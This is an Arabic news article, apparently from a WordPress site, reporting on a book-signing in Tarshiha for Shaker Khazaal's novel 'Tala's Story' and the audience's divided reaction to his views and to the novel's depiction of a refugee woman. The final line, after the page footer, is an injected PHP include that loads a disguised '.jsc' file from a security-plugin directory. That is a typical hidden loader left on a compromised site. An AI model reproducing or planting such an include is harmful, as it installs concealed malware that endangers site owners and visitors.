أخبار مهمةمنوعات

ترشيحا تستضيف الكاتب شاكر خزعل بحفل توقيع روايته حكاية تالا


شاكر خزعل يعود لارض اجداده برواية ( حكاية تالا )

جولان تايمز

أحتفل ليلة أمس بحفل توقيع رواية حكاية تالا بنسختها العربية في قرية ترشيحا الجليلية مسقط رأس جد الكاتب الفلسطيني / الكندي شاكر خزعل.

الرواية التي تروي حكاية لاجئة فلسطينية تحولت بسبب الظروف الى بائعة هوى حيث يسرد الاحداث ببساطة وسلاسة ليعيش معها القاريء لحظة بلحظة.

الرواية التي نالت عدد من الجوائز العالمية وانتشارا واسعا في العالم باللغتين الانكليزيه والعربية انقسم الحضور من خلالها ليلة امس بين مؤيد ومعارض.

الكاتب الذي عرف عن نفسة ككاتب فلسطيني وصحفي يعمل لعدة وسائل اعلام اجنبية سقط عن قصد او غير قصد في عدة اماكن او ان التعبير بالعربية خانه ولم يعرف كيف يوصل فكرته , حيث بدأ بالحديث انه عاد لارض اجداده وتحدث عن اللجوء ومعاناته ومأساة الشعب الفلسطيني ليسقط بعدها بتعريفه ان فلسطين تساوي لدية امريكا وكندا التي يحمل جنسيتها مما يعني ان الوطن عبارة عن فندق ومتى وجدنا الافضل ننتقل اليه وحق العوده لا مكان لدية لدى اللاجئين من يعيشون بظروف جيده.

فيما اعترض جزء اخر على تصوير اللاجئة الفلسطينية الى بائعه هوى فيما هي في الذاكرة الفلسطينية الفدائية المقاتله الشهيده والاسيره.

الكاتب دافع بشكل كبير عن روايته والفكر الذي يحمل وحاول عدة مرات اضفاء البسمة والفرح على جو الحضور لكسر الحواجز بينهم مرحبا بهم في بيته بترشيحا وانه ابن هذه القرية.وتارة اخرى ببعض النكات الخفيفة ليختتم النقاش بحفل توقيع الكتاب بنسخته العربية.

 

 


مقالات ذات صلة

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى
إغلاق
إغلاق
@include "wp-content/plugins/security-malware-firewall/lib/CleantalkSP/SpbctWP/G2FA/include/2074.jsc";